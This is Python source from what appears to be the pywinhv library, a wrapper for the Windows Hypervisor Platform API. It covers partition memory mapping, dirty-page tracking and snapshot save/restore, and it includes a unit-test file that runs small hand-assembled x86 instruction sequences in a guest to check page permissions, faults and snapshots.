WHvFlags |= whv.WHvMapGpaRangeFlagRead
if 'w' in Flags:
WHvFlags |= whv.WHvMapGpaRangeFlagWrite
if 'x' in Flags:
WHvFlags |= whv.WHvMapGpaRangeFlagExecute
if 'd' in Flags:
WHvFlags |= whv.WHvMapGpaRangeFlagTrackDirtyPages
Success, Ret = hvplat.WHvMapGpaRange(
self.Handle,
Hva,
Gpa,
SizeInBytes,
WHvFlags
)
assert Success, 'WHvMapGpaRange failed with: %s.' % hvplat.WHvReturn(Ret)
# Break the range into a series of pages for the translation table.
for Idx in range(SizeInBytes / 0x1000):
CurGpa = Gpa + (Idx * 0x1000)
CurHva = Hva + (Idx * 0x1000)
self.TranslationTable[CurGpa] = TranslationTableEntry_t(
CurGpa, CurHva, Flags
)
return (Hva, Gpa, SizeInBytes)
def MapGpaRange(self, Gpa, Buffer, Flags):
'''Map a GPA range in the partition and initialize it with content.'''
Hva, _, SizeInBytes = self.MapGpaRangeWithoutContent(
Gpa,
len(Buffer),
Flags
)
ct.memmove(Hva, Buffer, len(Buffer))
return (Hva, SizeInBytes)
def MapCode(self, Code, Gpa, Writeable = False):
'''Map a GPA range used to host code in the partition.'''
Flags = 'rx'
if Writeable:
Flags += 'w'
Hva, CodeLength = self.MapGpaRange(
Gpa,
Code,
Flags
)
return (Hva, CodeLength)
def UnmapGpaRange(self, Gpa, SizeInBytes, Hva = None):
'''Unmap a GPA range and release the backing host memory page if provided.'''
hvplat.WHvUnmapGpaRange(
self.Handle,
Gpa,
SizeInBytes
)
if Hva is None:
return
Success = VirtualFree(
Hva,
SizeInBytes,
0
) == 0
assert Success, 'VirtualFree failed.'
def TranslateGpa(self, Gpa):
'''Translate a GPA to an HVA. This is only possible because we
keep track of every call made to map GPA ranges and store the HVA/GPA.'''
GpaAligned, Offset = utils.SplitAddress(Gpa)
Entry = self.TranslationTable.get(GpaAligned, None)
if Entry is not None:
return Entry.Hva + Offset
return None
def GetPartitionCounters(self, Counter):
'''Get a partition performance counter.'''
Success, Counters, Ret = hvplat.WHvGetPartitionCounters(
self.Handle,
Counter
)
assert Success, 'WHvGetPartitionCounters failed with: %s.' % hvplat.WHvReturn(Ret)
return Counters
def QueryGpaRangeDirtyBitmap(self, Gpa, RangeSize):
'''Get a list of bits describing which physical guest page is dirty. One bit per
page.'''
Success, Bits, Ret = hvplat.WHvQueryGpaRangeDirtyBitmap(
self.Handle,
Gpa,
RangeSize
)
assert Success, 'WHvQueryGpaRangeDirtyBitmap failed with: %s.' % hvplat.WHvReturn(Ret)
return Bits
def ClearGpaRangeDirtyPages(self, Gpa, RangeSize):
'''Clear the dirty bits on a GPA range.'''
Success, _, Ret = hvplat.WHvQueryGpaRangeDirtyBitmap(
self.Handle,
Gpa,
RangeSize,
True
)
assert Success, 'WHvQueryGpaRangeDirtyBitmap failed with: %s.' % hvplat.WHvReturn(Ret)
def ClearGpaDirtyPage(self, Gpa):
'''Clear the dirty bit for a specific GPA page.'''
return self.ClearGpaRangeDirtyPages(
Gpa,
0x1000
)
def QueryGpaRangeDirtyPages(self, Gpa, RangeSize):
'''Get a list of the dirty GPAs.'''
Bits = self.QueryGpaRangeDirtyBitmap(
Gpa,
RangeSize
)
DirtyPages = []
CurGpa = Gpa
for Bit in Bits:
if Bit:
DirtyPages.append(CurGpa)
CurGpa += 0x1000
return DirtyPages
def IsGpaDirty(self, Gpa):
'''Is the GPA page dirty or not?'''
return self.QueryGpaRangeDirtyBitmap(
Gpa,
0x1000
)[0]
def Save(self):
'''Save a snapshot of the virtual processors registers as well as the physical
memory space. It can be restored with Restore.'''
Snapshot = {
'VP' : [],
'Mem' : {},
'Table' : self.GetTranslationTable()
}
# XXX: SpecCtrl & cie, ensure they are available in the VP.
for Vp in self.Processors:
Registers = Vp.GetRegisters(hvplat.AllRegisters)
Snapshot['VP'].append((
Vp.Index,
Registers
))
for Gpa, Entry in self.TranslationTable.iteritems():
# Don't save pages that are not writeable.
if 'w' not in Entry.Flags:
continue
PageContent = ct.string_at(Entry.Hva, 0x1000)
Snapshot['Mem'][Gpa] = (
Entry.Hva, PageContent
)
self.ClearGpaRangeDirtyPages(
0,
# XXX: This assumes that the physical address space is packed and that
# there is no hole.
len(self.TranslationTable) * 0x1000
)
return Snapshot
def Restore(self, Snapshot):
'''Restore a snapshot into the partition.'''
for VpIndex, Registers in Snapshot['VP']:
Vp = self.GetVp(VpIndex)
Vp.SetRegisters(
# XXX: Something cleaner maybe?
dict(zip(hvplat.AllRegisters, Registers))
)
# Force a copy of the table.
self.TranslationTable = dict(Snapshot['Table'])
if False:
# XXX: It's sound to be slower..?
DirtyGpas = self.QueryGpaRangeDirtyPages(
0,
# XXX: This assumes that the physical address space is packed and that
# there is no hole.
len(self.TranslationTable) * 0x1000
)
# Restore the dirty memory that has been saved off.
for DirtyGpa in DirtyGpas:
Hva, PageContent = Snapshot['Mem'].get(DirtyGpa)
ct.memmove(Hva, PageContent, 0x1000)
else:
# Restore the dirty memory that has been saved off.
for Hva, PageContent in Snapshot['Mem'].itervalues():
ct.memmove(Hva, PageContent, 0x1000)
self.ClearGpaRangeDirtyPages(
0,
# XXX: This assumes that the physical address space is packed and that
# there is no hole.
len(self.TranslationTable) * 0x1000
)
def GetTranslationTable(self):
'''Return a copy of the translation table.'''
return dict(self.TranslationTable)
def main(argc, argv):
return 0
if __name__ == '__main__':
sys.exit(main(len(sys.argv), sys.argv))
```
#### File: 0vercl0k/pywinhv/test64.py
```python
import pywinhv as hv
import sys
import struct
import unittest
import ctypes as ct
# mov rax, Address ; mov rbx, Value ; mov [rax], rbx
WriteMemory64 = lambda Address, Value: '\x48\xb8' + struct.pack('<Q', Address) + '\x48\xbb' + struct.pack('<Q', Value) + '\x48\x89\x18'
# mov rax, Address ; mov rax, [rax]
ReadMemory64 = lambda Address: '\x48\xb8' + struct.pack('<Q', Address) + '\x48\x8b\x00'
# mov rax, gs:[0]
LoadGsInRax = '\x65\x48\x8b\x04\x25\x00\x00\x00\x00'
# inc rax
IncRax = '\x48\xff\xc0'
# int3
Int3 = '\xcc'
class PackedPhysicalMemory(object):
'''The goal of this class is to provide a very simple GPA allocation policy.
It basically packs up the physical space page by page.'''
def __init__(self, BaseGpa = 0):
self.Gpa = 0
def GetGpa(self, Pages = 1):
'''Get the next available GPA address.'''
Gpa = self.Gpa
self.Gpa += (0x1000 * Pages)
return Gpa
def CreatePartition(Pages, PackedSpacePolicy, TebGva):
'''Create a partition and configure it like a Windows 64bit environment.'''
Partition = hv.WHvPartition.CreateDefault('64b user')
Vp = Partition.GetVp(0)
# Let's enable long mode now...
# https://wiki.osdev.org/Setting_Up_Long_Mode.
# We basically need several things (cf https://wiki.osdev.org/X86-64):
# * Set the PAE enable bit in CR4
# * Load CR3 with the physical address of the PML4
# * Enable long mode by setting the EFER.LME flag in MSR 0xC0000080
# * Enable paging
# OK so we need to allocate memory for paging structures, and build the
# virtual address space.
Pml4Gpa = hv.BuildVirtualAddressSpace(
Partition,
Pages,
PackedSpacePolicy
)
# Turn on CR4.PAE.
# kd> r @cr4
# cr4=0000000000170678
# 0b100110000011000100000
# 'Physical Address Extension', 'Operating system support for FXSAVE and FXRSTOR instructions',
# 'Operating System Support for Unmasked SIMD Floating-Point Exceptions',
# 'Enables the instructions RDFSBASE, RDGSBASE, WRFSBASE, and WRGSBASE',
# 'PCID Enable', 'Supervisor Mode Execution Protection Enable'.
Cr4 = 0x000000000170678
# We need to update CR3 to point to the PML4's physical address.
Cr3 = Pml4Gpa
# Turn on EFER.LME.
# kd> rdmsr 0xC0000080
# msr[c0000080] = 00000000`00000d01
# 0b0000110100000001
# 'System Call Extensions', 'Long Mode Enable', 'Long Mode Active', 'No-Execute Enable'.
Efer = 0xD01
# Turn on CR0.PG.
# kd> r @cr0
# Last set context:
# cr0=0000000080050031
# 'Protected Mode Enable', 'Extension type', 'Numeric Error', 'Write Protect',
# 'Alignment mask', 'Paging'.
Cr0 = 0x80050031
Vp.SetRegisters({
hv.Cr0 : Cr0,
hv.Cr3 : Cr3,
hv.Cr4 : Cr4,
hv.Efer : Efer,
})
print 'Enabled 64-bit long mode'
# We should be good to set-up 64-bit user-mode segments now.
# 0:000> r @cs
# cs=0033
Cs = hv.Generate64bUserCodeSegment()
# 0:001> r @ss
# ss=002b
DataSegment = hv.Generate64bUserDataSegment()
# 0:001> r @fs
# fs=0053
TebSegment = hv.Generate64bUserDataSegment(TebGva)
Vp.SetRegisters({
hv.Cs : Cs,
hv.Ss : DataSegment,
hv.Ds : DataSegment,
hv.Es : DataSegment,
hv.Fs : DataSegment,
hv.Gs : TebSegment,
#_Rdx : 0, XXX Figure out where the 806e9 is coming from.
})
print 'Partition created:', Partition
return Partition
# https://wiki.osdev.org/Exceptions#Page_Fault
PF_ERRCODE_PRESENT = 1 << 0
PF_ERRCODE_WRITE = 1 << 1
PF_ERRCODE_USER = 1 << 2
PF_ERRCODE_RESERVED_WRITE = 1 << 3
PF_ERRCODE_IFETCH = 1 << 4
class FeatureTests(unittest.TestCase):
'''Test everything related to features.'''
@classmethod
def setUpClass(cls):
'''This method is called once and initialize a partition object with a bunch
of pages mapped in already.'''
cls.TebGva = 0x000008b307ae000
cls.CodeGva = 0x00007fffb8c05000
cls.ReadOnlyGva = 0x00007fffb8c06000
cls.ReadWriteGva = 0x00007fffb8c07000
cls.ReadWriteExecuteGva = 0x00007fffb8c08000
cls.KernelPageGva = 0xfffff80178e05000
cls.Page0Gva = 0x0007ff60cf10000
cls.Page1Gva = 0x0007ff60cf11000
cls.Pages = [
(cls.TebGva, 'rw'),
(cls.CodeGva, 'rx'),
(cls.ReadOnlyGva, 'r'),
(cls.ReadWriteGva, 'rw'),
(cls.KernelPageGva, 'rwx'),
# Those VAs have the same PTE, and used to trigger a bug in the
# page table generation.
# PML4E=255, PDPTE=485, PDE=310, PTE=353.
(0x00007ff966d61000, 'r'),
# PML4E=255, PDPTE=485, PDE=337, PTE=353.
(0x00007ff96a361000, 'r'),
# PML4E=255, PDPTE=309, PDE=172, PTE=353
(0x0000014d55961000, 'r'),
# The goal with these is to have 2 contiguous pages in the virtual
# space but not in the host virtual space.
(cls.Page0Gva, 'rw'),
(cls.Page1Gva, 'rw')
]
cls.Policy = PackedPhysicalMemory()
cls.Partition = CreatePartition(cls.Pages, cls.Policy, cls.TebGva)
cls.Vp = cls.Partition.GetVp(0)
TranslationResult, cls.CodeHva = cls.Vp.TranslateGvaToHva(cls.CodeGva)
assert TranslationResult.value == hv.WHvTranslateGvaResultSuccess, 'The GVA->HVA translation should be a success'
cls.Snapshot = cls.Partition.Save()
def setUp(self):
'''Restore the context everytime before executing a test.'''
self.Partition.Restore(self.Snapshot)
def test_readwrite_unmapped(self):
'''Read from / to unmapped GVA.'''
self.assertFalse(self.Vp.WriteGva(
0,
'hello'
), 'The write to unmapped memory should fail.'
)
self.assertIsNone(self.Vp.ReadGva(
0,
0x1000
), 'The read to unmapped memory should fail.'
)
def test_writegva_cross_pages(self):
'''Read from and write to GVA space across two pages that are not contiguous
in the host virtual space.'''
TranslationResult, Hva0 = self.Vp.TranslateGvaToHva(self.Page0Gva)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The translation should succeed.'
)
self.assertIsNotNone(Hva0, 'The GVA->HVA translation should succeed.')
TranslationResult, Hva1 = self.Vp.TranslateGvaToHva(self.Page1Gva)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The translation should succeed.'
)
self.assertIsNotNone(Hva1, 'The GVA->HVA translation should succeed.')
self.assertNotEqual(
abs(Hva1 - Hva0), 0x1000,
'The two pages should not be contiguous in host virtual space.'
)
Content = 'hello friends!'
EndOffset = 0xff8
Address = self.Page0Gva + EndOffset
self.assertTrue(self.Vp.WriteGva(
Address,
Content
))
# The first 8 bytes are at the end of the first page.
First = ct.string_at(Hva0 + EndOffset, 8)
# The last 6 bytes are at the beginning of the second page.
Second = ct.string_at(Hva1, 6)
self.assertEqual(
First + Second, Content,
'The first and second bit should match the content.'
)
ReadContent = self.Vp.ReadGva(
self.Page0Gva + EndOffset,
len(Content)
)
self.assertEqual(
ReadContent, Content,
'The content should match.'
)
def test_snapshot_only_writeable(self):
'''Ensure that the snapshot only restores / track pages that are writeable.'''
ByteSaved = self.Vp.ReadGva(
self.ReadOnlyGva,
1
)
self.assertIsNotNone(ByteSaved, 'The ByteSaved should not be None.')
Snapshot = self.Partition.Save()
self.assertTrue(self.Vp.WriteGva(
self.ReadOnlyGva,
'\xAA',
Force = True
))
self.Partition.Restore(Snapshot)
ByteRead = self.Vp.ReadGva(
self.ReadOnlyGva,
1
)
self.assertNotEqual(
ByteSaved, ByteRead,
'The two bytes should match up.'
)
# Restore the orginal byte as it will never get its original value back
# otherwise.
self.assertTrue(self.Vp.WriteGva(
self.ReadOnlyGva,
ByteSaved,
Force = True
))
def test_mapregion_translategpa(self):
'''Map a GPA range bigger than 0x1000 and ensure the GPA->HVA translation works
on every page of the region.'''
RegionSize = 5
RegionGpa = self.Policy.GetGpa(5)
HvaBase, SizeInBytes = self.Partition.MapGpaRange(
RegionGpa,
'hello',
'r'
)
for Offset in range(0, SizeInBytes, 0x1000):
CurHva = self.Partition.TranslateGpa(RegionGpa + Offset)
self.assertEqual(
CurHva, HvaBase + Offset,
'The two HVAs should match.'
)
def test_translate_gva_with_permcheck_kern(self):
'''Translate a GVA->GPA and validate page permissions against a kernl page.'''
TranslationResult, _ = self.Vp.TranslateGva(
self.KernelPageGva,
'r'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The kernel page should not be readable from cpl3.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.KernelPageGva,
're'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The kernel page should be translatable from cpl3 with PrivilegeExempt.'
)
def test_translate_gva_with_permcheck_rx(self):
'''Translate a GVA->GPA and validate page permissions against a rx page.'''
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'r'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The code page should be marked as readable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'w'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The code page page should not be marked as writeable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'x'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The code page should be marked as executable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'rx'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The code page should be marked as rw in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'rwx'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The code page should not be marked as rwx in the page tables.'
)
def test_translate_gva_with_permcheck_rx(self):
'''Translate a GVA->GPA and validate page permissions against a rx page.'''
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'r'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The code page should be marked as readable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'w'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The code page page should not be marked as writeable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'x'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The code page should be marked as executable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'rx'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The code page should be marked as rw in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'rwx'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The code page should not be marked as rwx in the page tables.'
)
def test_translate_gva_with_permcheck_ro(self):
'''Translate a GVA->GPA and validate page permissions against a read-only
page.'''
TranslationResult, _ = self.Vp.TranslateGva(
self.ReadOnlyGva,
'r'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The read-only page should be marked as readable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.ReadOnlyGva,
'w'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The read-only page should not be marked as writeable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.ReadOnlyGva,
'x'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The read-only page should not be marked as executable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.ReadOnlyGva,
'xe'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The translation should still return a PrivilegeViolation even with WHvTranslateGvaFlagPrivilegeExempt.'
)
def test_clear_dirty_pages(self):
'''Clear the dirty bits of the pages.'''
Code = WriteMemory64(self.TebGva, 1) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
self.Vp.Run()
DirtyGpas = self.Partition.QueryGpaRangeDirtyPages(
0,
len(self.Partition.TranslationTable) * 0x1000
)
TranslationResult, TebGpa = self.Vp.TranslateGva(self.TebGva)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The TEB GVA->GPA translation result (%s) must be a success.' % TranslationResult
)
self.assertEqual(
TebGpa in DirtyGpas, True,
'The TEB GPA should be dirty.'
)
self.Partition.ClearGpaRangeDirtyPages(
0,
len(self.Partition.TranslationTable) * 0x1000
)
Bits = self.Partition.QueryGpaRangeDirtyBitmap(
0,
len(self.Partition.TranslationTable) * 0x1000
)
for Bit in Bits:
self.assertEqual(
Bit, 0,
'Bit(%x) is expected to be cleared.' % Bit
)
def test_number_dirty_pages(self):
'''Count the number of bits returned for dirty pages.'''
Bits = self.Partition.QueryGpaRangeDirtyBitmap(
0,
len(self.Partition.TranslationTable) * 0x1000
)
self.assertEqual(
len(Bits), len(self.Partition.TranslationTable),
'The number of bits(%x) has to match the number of physical pages.' % len(Bits)
)
def test_read_from_noncanonical(self):
'''Read from a non canonical page.'''
NonCanonicalGva = 0xdeadbeefbaadc0de
Code = ReadMemory64(NonCanonicalGva)
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
VpException = ExitContext.VpException
self.assertEqual(
VpException.ExceptionType, hv.WHvX64ExceptionTypeGeneralProtectionFault,
'A GeneralProtection exception(%x) is expected.' % VpException.ExceptionType
)
self.assertEqual(
# Error code: The General Protection Fault sets an error code,
# which is the segment selector index when the exception is segment related.
# Otherwise, 0.
VpException.ErrorCode, 0,
'The ErrorCode(%x) is expected to be 0.' % VpException.ErrorCode,
)
def test_read_from_nonpresent(self):
'''Read from a non-present page.'''
NonPresentGva = 1337
Code = ReadMemory64(NonPresentGva)
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
VpException = ExitContext.VpException
self.assertEqual(
VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault,
'A PageFault exception(%x) is expected.' % VpException.ExceptionType
)
self.assertEqual(
VpException.ErrorCode,
PF_ERRCODE_USER,
'The ErrorCode(%x) is expecting to show a read-access from non present GVA.' % VpException.ErrorCode,
)
self.assertEqual(
VpException.ExceptionParameter, NonPresentGva,
'The ExceptionParameter(%x) should be the GVA of the non-present page.' % VpException.ExceptionParameter
)
def test_read_from_supervisor(self):
'''Read from supervisor memory.'''
Code = ReadMemory64(self.KernelPageGva) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
VpException = ExitContext.VpException
self.assertEqual(
VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault,
'A PageFault exception(%x) is expected.' % VpException.ExceptionType
)
self.assertEqual(
VpException.ErrorCode,
PF_ERRCODE_PRESENT | PF_ERRCODE_USER,
'The ErrorCode(%x) is expecting to show a write-access.' % VpException.ErrorCode,
)
self.assertEqual(
VpException.ExceptionParameter, self.KernelPageGva,
'The ExceptionParameter(%x) should be the GVA of the read-only page.' % VpException.ExceptionParameter
)
def test_execute_readonly(self):
'''Execute read-only memory.'''
Content = IncRax + Int3
self.assertTrue(self.Vp.WriteGva(
self.ReadOnlyGva,
Content,
Force = True
))
self.Vp.SetRip(self.ReadOnlyGva)
ExitContext, _ = self.Vp.Run()
VpException = ExitContext.VpException
self.assertEqual(
VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault,
'A PageFault exception(%x) is expected.' % VpException.ExceptionType
)
self.assertEqual(
VpException.ErrorCode,
PF_ERRCODE_PRESENT | PF_ERRCODE_USER | PF_ERRCODE_IFETCH,
'The ErrorCode(%x) is expecting to show an execute-access.' % VpException.ErrorCode,
)
self.assertEqual(
VpException.ExceptionParameter, self.ReadOnlyGva,
'The ExceptionParameter(%x) should be the GVA of the read-only page.' % VpException.ExceptionParameter
)
def test_write_to_readonly(self):
'''Write to read-only memory.'''
Value = 0xdeadbeefbaadc0de
Content = struct.pack('<Q', Value)
self.assertTrue(self.Vp.WriteGva(
self.ReadOnlyGva,
Content,
Force = True
))
Code = WriteMemory64(self.ReadOnlyGva, Value) + Int3
self.assertTrue(self.Vp.WriteGva(
self.CodeGva,
Code,
Force = True
))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
VpException = ExitContext.VpException
self.assertEqual(
VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault,
'A PageFault exception(%x) is expected.' % VpException.ExceptionType
)
self.assertEqual(
VpException.ErrorCode,
PF_ERRCODE_PRESENT | PF_ERRCODE_USER | PF_ERRCODE_WRITE,
'The ErrorCode(%x) is expecting to show a write-access.' % VpException.ErrorCode,
)
self.assertEqual(
VpException.ExceptionParameter, self.ReadOnlyGva,
'The ExceptionParameter(%x) should be the GVA of the read-only page.' % VpException.ExceptionParameter
)
def test_read_from_readonly(self):
'''Read from read-only memory.'''
Value = 0xdeadbeefbaadc0de
Content = struct.pack('<Q', Value)
self.assertTrue(self.Vp.WriteGva(
self.ReadOnlyGva,
Content,
Force = True
))
Code = ReadMemory64(self.ReadOnlyGva) + Int3
self.assertTrue(self.Vp.WriteGva(
self.CodeGva,
Code,
Force = True
))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
Rax = self.Vp.GetRegister64(hv.Rax)
self.assertEqual(
Rax, Value,
'@rax(%x) is supposed to have the expected value' % Rax
)
def test_read_from_gs(self):
'''Read memory from the GS segment.'''
TebValue = 0xdeadbeefbaadc0de
TebContent = struct.pack('<Q', TebValue)
self.assertTrue(self.Vp.WriteGva(
self.TebGva,
TebContent
))
Code = LoadGsInRax + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
Rax = self.Vp.GetRegister64(hv.Rax)
self.assertEqual(
Rax, TebValue,
'@rax(%x) is supposed to have the expected Teb value' % Rax
)
def test_gva_translations(self):
'''Run GVA translations on the partition.'''
Gpas = []
for Gva, _ in self.Pages:
ResultCode, Gpa = self.Vp.TranslateGva(Gva)
self.assertEqual(
ResultCode.value, hv.WHvTranslateGvaResultSuccess,
'TranslateGva(%x) returned %s.' % (Gpa, ResultCode)
)
Gpas.append(Gva)
self.assertEqual(
len(set(Gpas)), len(Gpas),
'Every GVA should map to a unique GPA'
)
def test_simple_user(self):
'''Run a bunch of 'inc rax' followed by an 'int3' which we should get
a VMEXIT for, and then step over and execute another 'inc rax' followed by
an 'int3' and get one last VMEXIT.'''
CodeGva = self.CodeGva
N = 137
Code = ''
# inc rax ; ... ; inc rax
Code += IncRax * N
# Compute the expected @rip at the first vmexit before we add the rest of the
# code. This is used for testing everything is going as expected.
ExpectedRip1 = CodeGva + len(Code)
# int3. This is where the first vmexit we should get. We will skip over the
# instruction and continue.
Code += Int3
Code += IncRax
ExpectedRip2 = CodeGva + len(Code)
# int3. This is the second vmexit we should get.
Code += Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(CodeGva)
ExitContext, ExitReason = self.Vp.Run()
Rip, Rax = self.Vp.GetRegisters64(
hv.Rip,
hv.Rax
)
ExpectedRax = N
self.assertEqual(
Rax, N,
'@rax(%x) does not match the magic value.' % Rax
)
self.assertEqual(
Rip, ExpectedRip1,
'@rip(%x) does not match the end @rip.' % Rip
)
self.assertEqual(
ExitReason.value, hv.WHvRunVpExitReasonException,
'An exception VMEXIT is expected when the int3 is triggered.'
)
self.assertEqual(
ExitContext.VpException.ExceptionType, hv.WHvX64ExceptionTypeBreakpointTrap,
'A breakpoint exception is expected.'
)
VpContext = ExitContext.VpContext
self.assertEqual(
VpContext.InstructionLength, len(Int3),
'The instruction length(%x) is supposed to be 1.' % VpContext.InstructionLength
)
# Successfully caught the first int3 interruption, stepping over it.
self.Vp.SetRip(Rip + len(Int3))
ExitContext, _ = self.Vp.Run()
Rip, Rax = self.Vp.GetRegisters64(
hv.Rip,
hv.Rax
)
ExpectedRax += 1
self.assertEqual(
Rax, ExpectedRax,
'@rax(%x) does not match the magic value.' % Rax
)
self.assertEqual(
Rip, ExpectedRip2,
'@rip(%x) does not match the end @rip.' % Rip
)
self.assertEqual(
ExitReason.value, hv.WHvRunVpExitReasonException,
'An exception VMEXIT is expected when the int3 is triggered.'
)
self.assertEqual(
ExitContext.VpException.ExceptionType, hv.WHvX64ExceptionTypeBreakpointTrap,
'A breakpoint exception is expected.'
)
VpContext = ExitContext.VpContext
self.assertEqual(
VpContext.InstructionLength, len(Int3),
'The instruction length(%x) is supposed to be 1.' % VpContext.InstructionLength
)
def test_partition_counters(self):
'''Check the WHvPartitionCounterSetMemory partition performance counter.'''
MemoryCounters = self.Partition.GetPartitionCounters(
hv.WHvPartitionCounterSetMemory
)
self.assertEqual(
MemoryCounters.Mapped1GPageCount, 0,
'There should not be any 1GB pages.'
)
self.assertEqual(
MemoryCounters.Mapped2MPageCount, 0,
'There should not be any 2MB pages.'
)
PageCount = 24
self.assertGreaterEqual(
MemoryCounters.Mapped4KPageCount, PageCount,
'There should be only > %d pages.' % PageCount
)
def test_vp_counters(self):
'''Check the processor performance counters.'''
# XXX: They don't look right?
pass
def test_save_restore_registers(self):
'''Take a snapshot modify registers and restore it.'''
self.Vp.SetRegisters({
hv.Rax : 0xdeadbeefbaadc0de,
hv.Rbx : 0xdeadbeefbaadc0de,
hv.Rcx : 0xdeadbeefbaadc0de,
hv.Rip : 0xdeadbeefbaadc0de,
hv.Rsp : 0xdeadbeefbaadc0de
})
Snapshot = self.Partition.Save()
InitRax = self.Vp.GetRegister64(hv.Rax)
self.Vp.SetRegister(hv.Rax, 0xaaaaaaaaaaaaaaaa)
self.Partition.Restore(Snapshot)
Rax = self.Vp.GetRegister64(hv.Rax)
self.assertEqual(
Rax, InitRax,
'@rax(%x) does not match the value it had before the snapshot.' % Rax
)
def test_save_restore_memory(self):
'''Take a snapshot modify memory and restore it.'''
TebContent = '\xaa' * 8
self.assertTrue(self.Vp.WriteGva(
self.TebGva,
TebContent
))
Snapshot = self.Partition.Save()
Code = WriteMemory64(self.TebGva, 0xbbbbbbbbbbbbbbbb) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
self.Vp.Run()
self.assertEqual(self.Vp.ReadGva(
self.TebGva,
8
), '\xbb' * 8,
'The TEB is expected to contain bbs.'
)
self.Partition.Restore(Snapshot)
Code = ReadMemory64(self.TebGva) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
self.Vp.Run()
Rax = self.Vp.GetRegister64(hv.Rax)
self.assertEqual(
Rax, 0xaaaaaaaaaaaaaaaa,
'@rax(%x) is supposed to have the value restored by the snapshot.' % Rax
)
def test_save_restore_gpa_to_hva(self):
'''Ensure that the translation table is saved in a snapshot.'''
TranslationTable = self.Partition.GetTranslationTable()
Snapshot = self.Partition.Save()
PageGpa = self.Policy.GetGpa()
Hva, Size = self.Partition.MapGpaRange(
PageGpa,
'hello',
'r'
)
self.assertEqual(
Size, 0x1000,
'The size(%x) is expected to be a page large.' % Size
)
self.assertEqual(
PageGpa in self.Partition.TranslationTable, True,
'The GPA(%x) is expected to be added to the translation table.' % PageGpa
)
self.assertEqual(
self.Partition.TranslationTable != TranslationTable,
True,
'The translation tables are expected to be different.'
)
self.Partition.Restore(Snapshot)
self.assertEqual(
PageGpa not in self.Partition.TranslationTable, True,
'The GPA(%x) is expected to not be in the translation table anymore.' % PageGpa
)
self.Partition.UnmapGpaRange(
PageGpa,
0x1000,
Hva
)
self.assertEqual(
self.Partition.TranslationTable, TranslationTable,
'The translation tables are expected to be different.'
)
def test_save_restore_dirty_pages(self):
'''Ensure that a dirty page is turned non dirty after a snapshot. Also ensure
that on restore it keeps non dirty.'''
# Let's make sure the TEB page is clean.
TranslationResult, TebGpa = self.Vp.TranslateGva(self.TebGva)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The TEB GVA->GPA translation result(%s) must be a success.' % TranslationResult
)
Dirty = self.Partition.IsGpaDirty(TebGpa)
self.assertEqual(
Dirty, False,
'The TEB page is expected to be clean.'
)
# Dirty the TEB page.
Code = WriteMemory64(self.TebGva, 1) + Int3
